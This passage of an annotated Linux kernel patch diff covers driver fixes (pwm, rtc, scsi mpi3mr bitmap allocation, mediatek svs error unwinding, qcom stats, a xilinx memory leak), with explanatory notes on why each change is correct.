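            if (mutex_lock_interruptible(&vclock->lock))
                    return -EINTR;  /* a signal arrived while waiting */
            *ns = timecounter_read(&vclock->tc);
            mutex_unlock(&vclock->lock);
            return 0;
    }
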
+diff --git a/drivers/pwm/pwm-sifive.c b/drivers/pwm/pwm-sifive.c
+index bb72393134016..89d53a0f91e65 100644
+--- a/drivers/pwm/pwm-sifive.c
++++ b/drivers/pwm/pwm-sifive.c
+@@ -159,7 +159,13 @@ static int pwm_sifive_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	mutex_lock(&ddata->lock);
+ 	if (state->period != ddata->approx_period) {
+-		if (ddata->user_count != 1) {
++		/*
++		 * Don't let a 2nd user change the period underneath the 1st user.
++		 * However, if ddata->approx_period == 0 this is the first time we set
++		 * any period, so let whoever gets here first set the period so other
++		 * users who agree on the period won't fail.
++		 */
++		if (ddata->user_count != 1 && ddata->approx_period) {
+ 			mutex_unlock(&ddata->lock);
+ 			return -EBUSY;
+ 		}
+diff --git a/drivers/pwm/pwm-stm32-lp.c b/drivers/pwm/pwm-stm32-lp.c
+index 3115abb3f52ab..61a1c87cd5016 100644
+--- a/drivers/pwm/pwm-stm32-lp.c
++++ b/drivers/pwm/pwm-stm32-lp.c
+@@ -127,7 +127,7 @@ static int stm32_pwm_lp_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	/* ensure CMP & ARR registers are properly written */
+ 	ret = regmap_read_poll_timeout(priv->regmap, STM32_LPTIM_ISR, val,
+-				       (val & STM32_LPTIM_CMPOK_ARROK),
++				       (val & STM32_LPTIM_CMPOK_ARROK) == STM32_LPTIM_CMPOK_ARROK,
+ 				       100, 1000);
+ 	if (ret) {
+ 		dev_err(priv->chip.dev, "ARR/CMP registers write issue\n");
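
The stm32-lp fix tightens the poll predicate: with a two-bit mask, "val & STM32_LPTIM_CMPOK_ARROK" is satisfied as soon as either CMPOK or ARROK is set, while comparing against the mask waits until both register writes have completed. In general terms:

    #include <assert.h>

    #define BIT_A 0x1
    #define BIT_B 0x2
    #define BOTH  (BIT_A | BIT_B)

    int main(void)
    {
            unsigned int val = BIT_A;  /* only one of the two flags set */

            assert(val & BOTH);            /* "any bit": exits the poll early */
            assert((val & BOTH) != BOTH);  /* "all bits": keeps waiting */
            return 0;
    }
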
+diff --git a/drivers/rtc/interface.c b/drivers/rtc/interface.c
+index 9edd662c69ace..3d0fbc644f578 100644
+--- a/drivers/rtc/interface.c
++++ b/drivers/rtc/interface.c
+@@ -392,7 +392,7 @@ int rtc_read_alarm(struct rtc_device *rtc, struct rtc_wkalrm *alarm)
+ 		return err;
+ 	if (!rtc->ops) {
+ 		err = -ENODEV;
+-	} else if (!test_bit(RTC_FEATURE_ALARM, rtc->features) || !rtc->ops->read_alarm) {
++	} else if (!test_bit(RTC_FEATURE_ALARM, rtc->features)) {
+ 		err = -EINVAL;
+ 	} else {
+ 		memset(alarm, 0, sizeof(struct rtc_wkalrm));
+diff --git a/drivers/rtc/rtc-sun6i.c b/drivers/rtc/rtc-sun6i.c
+index ed5516089e9a0..7038f47d77ff4 100644
+--- a/drivers/rtc/rtc-sun6i.c
++++ b/drivers/rtc/rtc-sun6i.c
+@@ -136,7 +136,6 @@ struct sun6i_rtc_clk_data {
+ 	unsigned int fixed_prescaler : 16;
+ 	unsigned int has_prescaler : 1;
+ 	unsigned int has_out_clk : 1;
+-	unsigned int export_iosc : 1;
+ 	unsigned int has_losc_en : 1;
+ 	unsigned int has_auto_swt : 1;
+ };
+@@ -271,10 +270,8 @@ static void __init sun6i_rtc_clk_init(struct device_node *node,
+ 	/* Yes, I know, this is ugly. */
+ 	sun6i_rtc = rtc;
+ 
+-	/* Only read IOSC name from device tree if it is exported */
+-	if (rtc->data->export_iosc)
+-		of_property_read_string_index(node, "clock-output-names", 2,
+-					      &iosc_name);
++	of_property_read_string_index(node, "clock-output-names", 2,
++				      &iosc_name);
+ 
+ 	rtc->int_osc = clk_hw_register_fixed_rate_with_accuracy(NULL,
+ 								iosc_name,
+@@ -315,13 +312,10 @@ static void __init sun6i_rtc_clk_init(struct device_node *node,
+ 		goto err_register;
+ 	}
+ 
+-	clk_data->num = 2;
++	clk_data->num = 3;
+ 	clk_data->hws[0] = &rtc->hw;
+ 	clk_data->hws[1] = __clk_get_hw(rtc->ext_losc);
+-	if (rtc->data->export_iosc) {
+-		clk_data->hws[2] = rtc->int_osc;
+-		clk_data->num = 3;
+-	}
++	clk_data->hws[2] = rtc->int_osc;
+ 	of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	return;
+ 
+@@ -361,7 +355,6 @@ static const struct sun6i_rtc_clk_data sun8i_h3_rtc_data = {
+ 	.fixed_prescaler = 32,
+ 	.has_prescaler = 1,
+ 	.has_out_clk = 1,
+-	.export_iosc = 1,
+ };
+ 
+ static void __init sun8i_h3_rtc_clk_init(struct device_node *node)
+@@ -379,7 +372,6 @@ static const struct sun6i_rtc_clk_data sun50i_h6_rtc_data = {
+ 	.fixed_prescaler = 32,
+ 	.has_prescaler = 1,
+ 	.has_out_clk = 1,
+-	.export_iosc = 1,
+ 	.has_losc_en = 1,
+ 	.has_auto_swt = 1,
+ };
+diff --git a/drivers/scsi/ipr.c b/drivers/scsi/ipr.c
+index 2022ffb450417..8c062afb2918d 100644
+--- a/drivers/scsi/ipr.c
++++ b/drivers/scsi/ipr.c
+@@ -1516,23 +1516,22 @@ static void ipr_process_ccn(struct ipr_cmnd *ipr_cmd)
+ }
+ 
+ /**
+- * strip_and_pad_whitespace - Strip and pad trailing whitespace.
+- * @i:		index into buffer
+- * @buf:		string to modify
++ * strip_whitespace - Strip trailing whitespace.
++ * @i:		size of buffer
++ * @buf:	string to modify
+  *
+- * This function will strip all trailing whitespace, pad the end
+- * of the string with a single space, and NULL terminate the string.
++ * This function will strip all trailing whitespace and
++ * NUL terminate the string.
+  *
+- * Return value:
+- * 	new length of string
+  **/
+-static int strip_and_pad_whitespace(int i, char *buf)
++static void strip_whitespace(int i, char *buf)
+ {
++	if (i < 1)
++		return;
++	i--;
+ 	while (i && buf[i] == ' ')
+ 		i--;
+-	buf[i+1] = ' ';
+-	buf[i+2] = '\0';
+-	return i + 2;
++	buf[i+1] = '\0';
+ }
+ 
+ /**
+@@ -1547,19 +1546,21 @@ static int strip_and_pad_whitespace(int i, char *buf)
+ static void ipr_log_vpd_compact(char *prefix, struct ipr_hostrcb *hostrcb,
+ 				struct ipr_vpd *vpd)
+ {
+-	char buffer[IPR_VENDOR_ID_LEN + IPR_PROD_ID_LEN + IPR_SERIAL_NUM_LEN + 3];
+-	int i = 0;
++	char vendor_id[IPR_VENDOR_ID_LEN + 1];
++	char product_id[IPR_PROD_ID_LEN + 1];
++	char sn[IPR_SERIAL_NUM_LEN + 1];
+ 
+-	memcpy(buffer, vpd->vpids.vendor_id, IPR_VENDOR_ID_LEN);
+-	i = strip_and_pad_whitespace(IPR_VENDOR_ID_LEN - 1, buffer);
++	memcpy(vendor_id, vpd->vpids.vendor_id, IPR_VENDOR_ID_LEN);
++	strip_whitespace(IPR_VENDOR_ID_LEN, vendor_id);
+ 
+-	memcpy(&buffer[i], vpd->vpids.product_id, IPR_PROD_ID_LEN);
+-	i = strip_and_pad_whitespace(i + IPR_PROD_ID_LEN - 1, buffer);
++	memcpy(product_id, vpd->vpids.product_id, IPR_PROD_ID_LEN);
++	strip_whitespace(IPR_PROD_ID_LEN, product_id);
+ 
+-	memcpy(&buffer[i], vpd->sn, IPR_SERIAL_NUM_LEN);
+-	buffer[IPR_SERIAL_NUM_LEN + i] = '\0';
++	memcpy(sn, vpd->sn, IPR_SERIAL_NUM_LEN);
++	strip_whitespace(IPR_SERIAL_NUM_LEN, sn);
+ 
+-	ipr_hcam_err(hostrcb, "%s VPID/SN: %s\n", prefix, buffer);
++	ipr_hcam_err(hostrcb, "%s VPID/SN: %s %s %s\n", prefix,
++		     vendor_id, product_id, sn);
+ }
+ 
+ /**
+diff --git a/drivers/scsi/mpi3mr/mpi3mr.h b/drivers/scsi/mpi3mr/mpi3mr.h
+index def4c5e15cd89..8a438f248a820 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr.h
++++ b/drivers/scsi/mpi3mr/mpi3mr.h
+@@ -955,19 +955,16 @@ struct scmd_priv {
+  * @chain_buf_count: Chain buffer count
+  * @chain_buf_pool: Chain buffer pool
+  * @chain_sgl_list: Chain SGL list
+- * @chain_bitmap_sz: Chain buffer allocator bitmap size
+  * @chain_bitmap: Chain buffer allocator bitmap
+  * @chain_buf_lock: Chain buffer list lock
+  * @bsg_cmds: Command tracker for BSG command
+  * @host_tm_cmds: Command tracker for task management commands
+  * @dev_rmhs_cmds: Command tracker for device removal commands
+  * @evtack_cmds: Command tracker for event ack commands
+- * @devrem_bitmap_sz: Device removal bitmap size
+  * @devrem_bitmap: Device removal bitmap
+- * @dev_handle_bitmap_sz: Device handle bitmap size
++ * @dev_handle_bitmap_bits: Number of bits in device handle bitmap
+  * @removepend_bitmap: Remove pending bitmap
+  * @delayed_rmhs_list: Delayed device removal list
+- * @evtack_cmds_bitmap_sz: Event Ack bitmap size
+  * @evtack_cmds_bitmap: Event Ack bitmap
+  * @delayed_evtack_cmds_list: Delayed event acknowledgment list
+  * @ts_update_counter: Timestamp update counter
+@@ -1128,7 +1125,6 @@ struct mpi3mr_ioc {
+ 	u32 chain_buf_count;
+ 	struct dma_pool *chain_buf_pool;
+ 	struct chain_element *chain_sgl_list;
+-	u16  chain_bitmap_sz;
+ 	void *chain_bitmap;
+ 	spinlock_t chain_buf_lock;
+ 
+@@ -1136,12 +1132,10 @@ struct mpi3mr_ioc {
+ 	struct mpi3mr_drv_cmd host_tm_cmds;
+ 	struct mpi3mr_drv_cmd dev_rmhs_cmds[MPI3MR_NUM_DEVRMCMD];
+ 	struct mpi3mr_drv_cmd evtack_cmds[MPI3MR_NUM_EVTACKCMD];
+-	u16 devrem_bitmap_sz;
+ 	void *devrem_bitmap;
+-	u16 dev_handle_bitmap_sz;
++	u16 dev_handle_bitmap_bits;
+ 	void *removepend_bitmap;
+ 	struct list_head delayed_rmhs_list;
+-	u16 evtack_cmds_bitmap_sz;
+ 	void *evtack_cmds_bitmap;
+ 	struct list_head delayed_evtack_cmds_list;
+ 
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index 0c4aabaefdcc4..1e4467ea8472a 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -1128,7 +1128,6 @@ static int mpi3mr_issue_and_process_mur(struct mpi3mr_ioc *mrioc,
+ static int
+ mpi3mr_revalidate_factsdata(struct mpi3mr_ioc *mrioc)
+ {
+-	u16 dev_handle_bitmap_sz;
+ 	void *removepend_bitmap;
+ 
+ 	if (mrioc->facts.reply_sz > mrioc->reply_sz) {
+@@ -1160,25 +1159,23 @@ mpi3mr_revalidate_factsdata(struct mpi3mr_ioc *mrioc)
+ 		    "\tcontroller while sas transport support is enabled at the\n"
+ 		    "\tdriver, please reboot the system or reload the driver\n");
+ 
+-	dev_handle_bitmap_sz = mrioc->facts.max_devhandle / 8;
+-	if (mrioc->facts.max_devhandle % 8)
+-		dev_handle_bitmap_sz++;
+-	if (dev_handle_bitmap_sz > mrioc->dev_handle_bitmap_sz) {
+-		removepend_bitmap = krealloc(mrioc->removepend_bitmap,
+-		    dev_handle_bitmap_sz, GFP_KERNEL);
++	if (mrioc->facts.max_devhandle > mrioc->dev_handle_bitmap_bits) {
++		removepend_bitmap = bitmap_zalloc(mrioc->facts.max_devhandle,
++						  GFP_KERNEL);
+ 		if (!removepend_bitmap) {
+ 			ioc_err(mrioc,
+-			    "failed to increase removepend_bitmap sz from: %d to %d\n",
+-			    mrioc->dev_handle_bitmap_sz, dev_handle_bitmap_sz);
++				"failed to increase removepend_bitmap bits from %d to %d\n",
++				mrioc->dev_handle_bitmap_bits,
++				mrioc->facts.max_devhandle);
+ 			return -EPERM;
+ 		}
+-		memset(removepend_bitmap + mrioc->dev_handle_bitmap_sz, 0,
+-		    dev_handle_bitmap_sz - mrioc->dev_handle_bitmap_sz);
++		bitmap_free(mrioc->removepend_bitmap);
+ 		mrioc->removepend_bitmap = removepend_bitmap;
+ 		ioc_info(mrioc,
+-		    "increased dev_handle_bitmap_sz from %d to %d\n",
+-		    mrioc->dev_handle_bitmap_sz, dev_handle_bitmap_sz);
+-		mrioc->dev_handle_bitmap_sz = dev_handle_bitmap_sz;
++			 "increased bits of dev_handle_bitmap from %d to %d\n",
++			 mrioc->dev_handle_bitmap_bits,
++			 mrioc->facts.max_devhandle);
++		mrioc->dev_handle_bitmap_bits = mrioc->facts.max_devhandle;
+ 	}
+ 
+ 	return 0;
+@@ -2957,27 +2954,18 @@ static int mpi3mr_alloc_reply_sense_bufs(struct mpi3mr_ioc *mrioc)
+ 	if (!mrioc->pel_abort_cmd.reply)
+ 		goto out_failed;
+ 
+-	mrioc->dev_handle_bitmap_sz = mrioc->facts.max_devhandle / 8;
+-	if (mrioc->facts.max_devhandle % 8)
+-		mrioc->dev_handle_bitmap_sz++;
+-	mrioc->removepend_bitmap = kzalloc(mrioc->dev_handle_bitmap_sz,
+-	    GFP_KERNEL);
++	mrioc->dev_handle_bitmap_bits = mrioc->facts.max_devhandle;
++	mrioc->removepend_bitmap = bitmap_zalloc(mrioc->dev_handle_bitmap_bits,
++						 GFP_KERNEL);
+ 	if (!mrioc->removepend_bitmap)
+ 		goto out_failed;
+ 
+-	mrioc->devrem_bitmap_sz = MPI3MR_NUM_DEVRMCMD / 8;
+-	if (MPI3MR_NUM_DEVRMCMD % 8)
+-		mrioc->devrem_bitmap_sz++;
+-	mrioc->devrem_bitmap = kzalloc(mrioc->devrem_bitmap_sz,
+-	    GFP_KERNEL);
++	mrioc->devrem_bitmap = bitmap_zalloc(MPI3MR_NUM_DEVRMCMD, GFP_KERNEL);
+ 	if (!mrioc->devrem_bitmap)
+ 		goto out_failed;
+ 
+-	mrioc->evtack_cmds_bitmap_sz = MPI3MR_NUM_EVTACKCMD / 8;
+-	if (MPI3MR_NUM_EVTACKCMD % 8)
+-		mrioc->evtack_cmds_bitmap_sz++;
+-	mrioc->evtack_cmds_bitmap = kzalloc(mrioc->evtack_cmds_bitmap_sz,
+-	    GFP_KERNEL);
++	mrioc->evtack_cmds_bitmap = bitmap_zalloc(MPI3MR_NUM_EVTACKCMD,
++						  GFP_KERNEL);
+ 	if (!mrioc->evtack_cmds_bitmap)
+ 		goto out_failed;
+ 
+@@ -3415,10 +3403,7 @@ static int mpi3mr_alloc_chain_bufs(struct mpi3mr_ioc *mrioc)
+ 		if (!mrioc->chain_sgl_list[i].addr)
+ 			goto out_failed;
+ 	}
+-	mrioc->chain_bitmap_sz = num_chains / 8;
+-	if (num_chains % 8)
+-		mrioc->chain_bitmap_sz++;
+-	mrioc->chain_bitmap = kzalloc(mrioc->chain_bitmap_sz, GFP_KERNEL);
++	mrioc->chain_bitmap = bitmap_zalloc(num_chains, GFP_KERNEL);
+ 	if (!mrioc->chain_bitmap)
+ 		goto out_failed;
+ 	return retval;
+@@ -4190,10 +4175,11 @@ void mpi3mr_memset_buffers(struct mpi3mr_ioc *mrioc)
+ 		for (i = 0; i < MPI3MR_NUM_EVTACKCMD; i++)
+ 			memset(mrioc->evtack_cmds[i].reply, 0,
+ 			    sizeof(*mrioc->evtack_cmds[i].reply));
+-		memset(mrioc->removepend_bitmap, 0, mrioc->dev_handle_bitmap_sz);
+-		memset(mrioc->devrem_bitmap, 0, mrioc->devrem_bitmap_sz);
+-		memset(mrioc->evtack_cmds_bitmap, 0,
+-		    mrioc->evtack_cmds_bitmap_sz);
++		bitmap_clear(mrioc->removepend_bitmap, 0,
++			     mrioc->dev_handle_bitmap_bits);
++		bitmap_clear(mrioc->devrem_bitmap, 0, MPI3MR_NUM_DEVRMCMD);
++		bitmap_clear(mrioc->evtack_cmds_bitmap, 0,
++			     MPI3MR_NUM_EVTACKCMD);
+ 	}
+ 
+ 	for (i = 0; i < mrioc->num_queues; i++) {
+@@ -4319,16 +4305,16 @@ void mpi3mr_free_mem(struct mpi3mr_ioc *mrioc)
+ 		mrioc->evtack_cmds[i].reply = NULL;
+ 	}
+ 
+-	kfree(mrioc->removepend_bitmap);
++	bitmap_free(mrioc->removepend_bitmap);
+ 	mrioc->removepend_bitmap = NULL;
+ 
+-	kfree(mrioc->devrem_bitmap);
++	bitmap_free(mrioc->devrem_bitmap);
+ 	mrioc->devrem_bitmap = NULL;
+ 
+-	kfree(mrioc->evtack_cmds_bitmap);
++	bitmap_free(mrioc->evtack_cmds_bitmap);
+ 	mrioc->evtack_cmds_bitmap = NULL;
+ 
+-	kfree(mrioc->chain_bitmap);
++	bitmap_free(mrioc->chain_bitmap);
+ 	mrioc->chain_bitmap = NULL;
+ 
+ 	kfree(mrioc->transport_cmds.reply);
+@@ -4887,9 +4873,10 @@ int mpi3mr_soft_reset_handler(struct mpi3mr_ioc *mrioc,
+ 
+ 	mpi3mr_flush_delayed_cmd_lists(mrioc);
+ 	mpi3mr_flush_drv_cmds(mrioc);
+-	memset(mrioc->devrem_bitmap, 0, mrioc->devrem_bitmap_sz);
+-	memset(mrioc->removepend_bitmap, 0, mrioc->dev_handle_bitmap_sz);
+-	memset(mrioc->evtack_cmds_bitmap, 0, mrioc->evtack_cmds_bitmap_sz);
++	bitmap_clear(mrioc->devrem_bitmap, 0, MPI3MR_NUM_DEVRMCMD);
++	bitmap_clear(mrioc->removepend_bitmap, 0,
++		     mrioc->dev_handle_bitmap_bits);
++	bitmap_clear(mrioc->evtack_cmds_bitmap, 0, MPI3MR_NUM_EVTACKCMD);
+ 	mpi3mr_flush_host_io(mrioc);
+ 	mpi3mr_cleanup_fwevt_list(mrioc);
+ 	mpi3mr_invalidate_devhandles(mrioc);
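[editor's note] The mpi3mr hunks above replace hand-rolled byte-count arithmetic (divide by 8, round up, kzalloc, memset) with the kernel bitmap API: bitmap_zalloc()/bitmap_free() size the allocation in whole unsigned longs, and bitmap_clear() takes a bit count, so the driver can drop its per-bitmap *_sz bookkeeping fields and track only dev_handle_bitmap_bits. A minimal, self-contained userspace sketch of the two sizing strategies — BITS_TO_LONGS is re-defined locally so the sample builds outside the kernel, and the numbers are illustrative:

#include <stdio.h>
#include <stdlib.h>

/* userspace stand-ins for the kernel's bitmap sizing helpers */
#define BITS_PER_LONG (8 * sizeof(unsigned long))
#define BITS_TO_LONGS(nbits) (((nbits) + BITS_PER_LONG - 1) / BITS_PER_LONG)

int main(void)
{
	unsigned int nbits = 1234;	/* e.g. facts.max_devhandle */

	/* old style: byte count, rounded up by hand */
	size_t bytes = nbits / 8 + (nbits % 8 ? 1 : 0);

	/* bitmap_zalloc() style: whole unsigned longs, zeroed */
	unsigned long *map = calloc(BITS_TO_LONGS(nbits), sizeof(*map));
	if (!map)
		return 1;

	printf("byte-count alloc: %zu bytes, bitmap alloc: %zu bytes\n",
	       bytes, BITS_TO_LONGS(nbits) * sizeof(*map));
	free(map);	/* the kernel code uses bitmap_free() */
	return 0;
}

The practical win is that callers stop mixing units: memset() took a byte length while the allocation was sized in bits, whereas bitmap_clear(map, 0, nbits) always speaks in bits.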
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_transport.c b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+index 3fc897336b5e0..3b61815979dab 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_transport.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+@@ -1280,7 +1280,7 @@ void mpi3mr_sas_host_add(struct mpi3mr_ioc *mrioc)
+ 
+ 	if (mrioc->sas_hba.enclosure_handle) {
+ 		if (!(mpi3mr_cfg_get_enclosure_pg0(mrioc, &ioc_status,
+-		    &encl_pg0, sizeof(dev_pg0),
++		    &encl_pg0, sizeof(encl_pg0),
+ 		    MPI3_ENCLOS_PGAD_FORM_HANDLE,
+ 		    mrioc->sas_hba.enclosure_handle)) &&
+ 		    (ioc_status == MPI3_IOCSTATUS_SUCCESS))
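[editor's note] The one-character mpi3mr_transport.c fix above is a classic sizeof-of-the-wrong-object bug: the enclosure-page read passed sizeof(dev_pg0) while filling encl_pg0, and the compiler cannot object because sizeof accepts any expression. A tiny illustration with hypothetical types and a hypothetical read_page() helper:

struct dev_pg0  { char raw[256]; };
struct encl_pg0 { char raw[64]; };

struct encl_pg0 encl;

read_page(&encl, sizeof(struct dev_pg0));	/* bug: asks for 256 bytes into 64 */
read_page(&encl, sizeof(encl));			/* fix: size of the object being filled */

Always sizing with the variable being filled (or sizeof(*ptr)) keeps the length and the destination from drifting apart.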
+diff --git a/drivers/soc/mediatek/mt8186-pm-domains.h b/drivers/soc/mediatek/mt8186-pm-domains.h
+index 108af61854a38..fce86f79c5055 100644
+--- a/drivers/soc/mediatek/mt8186-pm-domains.h
++++ b/drivers/soc/mediatek/mt8186-pm-domains.h
+@@ -304,7 +304,6 @@ static const struct scpsys_domain_data scpsys_domain_data_mt8186[] = {
+ 		.ctl_offs = 0x9FC,
+ 		.pwr_sta_offs = 0x16C,
+ 		.pwr_sta2nd_offs = 0x170,
+-		.caps = MTK_SCPD_KEEP_DEFAULT_OFF,
+ 	},
+ 	[MT8186_POWER_DOMAIN_ADSP_INFRA] = {
+ 		.name = "adsp_infra",
+@@ -312,7 +311,6 @@ static const struct scpsys_domain_data scpsys_domain_data_mt8186[] = {
+ 		.ctl_offs = 0x9F8,
+ 		.pwr_sta_offs = 0x16C,
+ 		.pwr_sta2nd_offs = 0x170,
+-		.caps = MTK_SCPD_KEEP_DEFAULT_OFF,
+ 	},
+ 	[MT8186_POWER_DOMAIN_ADSP_TOP] = {
+ 		.name = "adsp_top",
+@@ -332,7 +330,7 @@ static const struct scpsys_domain_data scpsys_domain_data_mt8186[] = {
+ 				MT8186_TOP_AXI_PROT_EN_3_CLR,
+ 				MT8186_TOP_AXI_PROT_EN_3_STA),
+ 		},
+-		.caps = MTK_SCPD_SRAM_ISO | MTK_SCPD_KEEP_DEFAULT_OFF | MTK_SCPD_ACTIVE_WAKEUP,
++		.caps = MTK_SCPD_SRAM_ISO | MTK_SCPD_ACTIVE_WAKEUP,
+ 	},
+ };
+ 
+diff --git a/drivers/soc/mediatek/mtk-svs.c b/drivers/soc/mediatek/mtk-svs.c
+index 0469c9dfeb04e..00526fd37d7b8 100644
+--- a/drivers/soc/mediatek/mtk-svs.c
++++ b/drivers/soc/mediatek/mtk-svs.c
+@@ -1324,7 +1324,7 @@ static int svs_init01(struct svs_platform *svsp)
+ 				svsb->pm_runtime_enabled_count++;
+ 			}
+ 
+-			ret = pm_runtime_get_sync(svsb->opp_dev);
++			ret = pm_runtime_resume_and_get(svsb->opp_dev);
+ 			if (ret < 0) {
+ 				dev_err(svsb->dev, "mtcmos on fail: %d\n", ret);
+ 				goto svs_init01_resume_cpuidle;
+@@ -1461,6 +1461,7 @@ static int svs_init02(struct svs_platform *svsp)
+ {
+ 	struct svs_bank *svsb;
+ 	unsigned long flags, time_left;
++	int ret;
+ 	u32 idx;
+ 
+ 	for (idx = 0; idx < svsp->bank_max; idx++) {
+@@ -1479,7 +1480,8 @@ static int svs_init02(struct svs_platform *svsp)
+ 							msecs_to_jiffies(5000));
+ 		if (!time_left) {
+ 			dev_err(svsb->dev, "init02 completion timeout\n");
+-			return -EBUSY;
++			ret = -EBUSY;
++			goto out_of_init02;
+ 		}
+ 	}
+ 
+@@ -1497,12 +1499,30 @@ static int svs_init02(struct svs_platform *svsp)
+ 		if (svsb->type == SVSB_HIGH || svsb->type == SVSB_LOW) {
+ 			if (svs_sync_bank_volts_from_opp(svsb)) {
+ 				dev_err(svsb->dev, "sync volt fail\n");
+-				return -EPERM;
++				ret = -EPERM;
++				goto out_of_init02;
+ 			}
+ 		}
+ 	}
+ 
+ 	return 0;
++
++out_of_init02:
++	for (idx = 0; idx < svsp->bank_max; idx++) {
++		svsb = &svsp->banks[idx];
++
++		spin_lock_irqsave(&svs_lock, flags);
++		svsp->pbank = svsb;
++		svs_switch_bank(svsp);
++		svs_writel_relaxed(svsp, SVSB_PTPEN_OFF, SVSEN);
++		svs_writel_relaxed(svsp, SVSB_INTSTS_VAL_CLEAN, INTSTS);
++		spin_unlock_irqrestore(&svs_lock, flags);
++
++		svsb->phase = SVSB_PHASE_ERROR;
++		svs_adjust_pm_opp_volts(svsb);
++	}
++
++	return ret;
+ }
+ 
+ static void svs_mon_mode(struct svs_platform *svsp)
+@@ -1594,12 +1614,16 @@ static int svs_resume(struct device *dev)
+ 
+ 	ret = svs_init02(svsp);
+ 	if (ret)
+-		goto out_of_resume;
++		goto svs_resume_reset_assert;
+ 
+ 	svs_mon_mode(svsp);
+ 
+ 	return 0;
+ 
++svs_resume_reset_assert:
++	dev_err(svsp->dev, "assert reset: %d\n",
++		reset_control_assert(svsp->rst));
++
+ out_of_resume:
+ 	clk_disable_unprepare(svsp->main_clk);
+ 	return ret;
+@@ -2385,14 +2409,6 @@ static int svs_probe(struct platform_device *pdev)
+ 		goto svs_probe_free_resource;
+ 	}
+ 
+-	ret = devm_request_threaded_irq(svsp->dev, svsp_irq, NULL, svs_isr,
+-					IRQF_ONESHOT, svsp->name, svsp);
+-	if (ret) {
+-		dev_err(svsp->dev, "register irq(%d) failed: %d\n",
+-			svsp_irq, ret);
+-		goto svs_probe_free_resource;
+-	}
+-
+ 	svsp->main_clk = devm_clk_get(svsp->dev, "main");
+ 	if (IS_ERR(svsp->main_clk)) {
+ 		dev_err(svsp->dev, "failed to get clock: %ld\n",
+@@ -2414,6 +2430,14 @@ static int svs_probe(struct platform_device *pdev)
+ 		goto svs_probe_clk_disable;
+ 	}
+ 
++	ret = devm_request_threaded_irq(svsp->dev, svsp_irq, NULL, svs_isr,
++					IRQF_ONESHOT, svsp->name, svsp);
++	if (ret) {
++		dev_err(svsp->dev, "register irq(%d) failed: %d\n",
++			svsp_irq, ret);
++		goto svs_probe_iounmap;
++	}
++
+ 	ret = svs_start(svsp);
+ 	if (ret) {
+ 		dev_err(svsp->dev, "svs start fail: %d\n", ret);
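[editor's note] Three related fixes land in mtk-svs.c: pm_runtime_resume_and_get() replaces pm_runtime_get_sync() (the latter leaves the usage count raised even when resume fails, so every error path needs a matching put), init02 failures now unwind all banks through out_of_init02 instead of returning with hardware half-configured, and the IRQ is requested only after the clocks and register mapping its handler depends on are set up. A kernel-context sketch of the runtime-PM difference (not compilable outside the kernel):

/* old: usage count is bumped even on failure, easy to leak */
ret = pm_runtime_get_sync(dev);
if (ret < 0) {
	pm_runtime_put_noidle(dev);	/* mandatory repair step */
	return ret;
}

/* new: the helper drops the count itself on failure */
ret = pm_runtime_resume_and_get(dev);
if (ret < 0)
	return ret;

Moving devm_request_threaded_irq() after clock enable and ioremap follows the same discipline as the unwind labels: a handler must never be able to fire before everything it dereferences exists.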
+diff --git a/drivers/soc/qcom/qcom_stats.c b/drivers/soc/qcom/qcom_stats.c
+index 121ea409fafcd..b252bedf0cf10 100644
+--- a/drivers/soc/qcom/qcom_stats.c
++++ b/drivers/soc/qcom/qcom_stats.c
+@@ -92,7 +92,7 @@ static int qcom_subsystem_sleep_stats_show(struct seq_file *s, void *unused)
+ 	/* Items are allocated lazily, so lookup pointer each time */
+ 	stat = qcom_smem_get(subsystem->pid, subsystem->smem_item, NULL);
+ 	if (IS_ERR(stat))
+-		return -EIO;
++		return 0;
+ 
+ 	qcom_print_stats(s, stat);
+ 
+@@ -170,20 +170,14 @@ static void qcom_create_soc_sleep_stat_files(struct dentry *root, void __iomem *
+ static void qcom_create_subsystem_stat_files(struct dentry *root,
+ 					     const struct stats_config *config)
+ {
+-	const struct sleep_stats *stat;
+ 	int i;
+ 
+ 	if (!config->subsystem_stats_in_smem)
+ 		return;
+ 
+-	for (i = 0; i < ARRAY_SIZE(subsystems); i++) {
+-		stat = qcom_smem_get(subsystems[i].pid, subsystems[i].smem_item, NULL);
+-		if (IS_ERR(stat))
+-			continue;
+-
++	for (i = 0; i < ARRAY_SIZE(subsystems); i++)
+ 		debugfs_create_file(subsystems[i].name, 0400, root, (void *)&subsystems[i],
+ 				    &qcom_subsystem_sleep_stats_fops);
+-	}
+ }
+ 
+ static int qcom_stats_probe(struct platform_device *pdev)
+diff --git a/drivers/soc/xilinx/xlnx_event_manager.c b/drivers/soc/xilinx/xlnx_event_manager.c
+index 2de082765befa..c76381899ef49 100644
+--- a/drivers/soc/xilinx/xlnx_event_manager.c
++++ b/drivers/soc/xilinx/xlnx_event_manager.c
+@@ -116,8 +116,10 @@ static int xlnx_add_cb_for_notify_event(const u32 node_id, const u32 event, cons
+ 		INIT_LIST_HEAD(&eve_data->cb_list_head);
+ 
+ 		cb_data = kmalloc(sizeof(*cb_data), GFP_KERNEL);
+-		if (!cb_data)
++		if (!cb_data) {
++			kfree(eve_data);
+ 			return -ENOMEM;
++		}
+ 		cb_data->eve_cb = cb_fun;
+ 		cb_data->agent_data = data;
+ 
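[editor's note] The xlnx_event_manager hunk plugs a partial-allocation leak: when the second allocation fails, the first one must be released before bailing out. The generic shape, with hypothetical names:

a = kmalloc(sizeof(*a), GFP_KERNEL);
if (!a)
	return -ENOMEM;

b = kmalloc(sizeof(*b), GFP_KERNEL);
if (!b) {
	kfree(a);	/* undo the earlier success before returning */
	return -ENOMEM;
}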
+diff --git a/drivers/soundwire/bus_type.c b/drivers/soundwire/bus_type.c
+index 04b3529f89293..963498db0fd22 100644
+--- a/drivers/soundwire/bus_type.c
++++ b/drivers/soundwire/bus_type.c
+@@ -105,20 +105,19 @@ static int sdw_drv_probe(struct device *dev)
+ 	if (ret)
+ 		return ret;
+ 
